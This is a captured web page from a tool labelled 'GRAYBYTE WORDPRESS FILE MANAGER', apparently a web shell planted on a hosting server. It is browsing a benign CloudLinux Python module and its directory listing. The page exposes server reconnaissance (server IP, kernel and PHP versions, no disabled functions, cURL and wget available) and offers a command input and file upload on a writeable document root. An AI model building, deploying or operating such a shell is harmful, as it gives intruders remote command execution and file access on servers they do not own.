GRAYBYTE WORDPRESS FILE MANAGER7991

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/ssa_utils/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/ssa_utils//run_manager.py
# -*- coding: utf-8 -*-

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

"""
This module contains SSA manager utility main run function
"""
import sys
from .cmdline_parser import cmd_parser_manager, parse_cmd_arguments
from .validations import validate
from ..internal.utils import configure_logging
from ..internal.constants import manager_log
from ..manager import initialize_manager
from ..internal.exceptions import SSAError


def run() -> None:
    """
    Main run function
    """
    configure_logging(manager_log)
    try:
        args = parse_cmd_arguments(cmd_parser_manager())
        cmd, validated_args = validate(args.__dict__)
    except SSAError as e:
        print(e)
        sys.exit(1)
    manager_run(cmd, **validated_args)


def manager_run(command, *args, **kwargs):
    """
    SSA Manager run function
    """
    try:
        manager_instance = initialize_manager()
        if command == 'set-config':
            result = manager_instance.set_config(kwargs)
        elif command == 'get-config':
            result = manager_instance.get_config()
        elif command == 'get-ssa-status':
            result = manager_instance.get_ssa_status()
        elif command == 'enable-ssa':
            result = manager_instance.enable_ssa()
        elif command == 'disable-ssa':
            result = manager_instance.disable_ssa()
        elif command == 'get-report':
            result = manager_instance.get_report()
        elif command == 'get-stat':
            result = manager_instance.get_stats()
        else:
            raise SSAError(f'Unknown action {command}')
        print(result)
    except SSAError as e:
        print(e)
        sys.exit(1)

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 01 2025 08:30:33
root / root
0755
__pycache__
--
May 01 2025 08:36:52
root / root
0755
__init__.py
0 KB
April 10 2025 08:42:28
root / root
0644
cmdline_parser.py
5.285 KB
April 10 2025 08:42:28
root / root
0644
run_agent.py
0.716 KB
April 10 2025 08:42:28
root / root
0644
run_autotracing.py
2.868 KB
April 10 2025 08:42:28
root / root
0644
run_manager.py
1.771 KB
April 10 2025 08:42:28
root / root
0644
validations.py
3.51 KB
April 10 2025 08:42:28
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF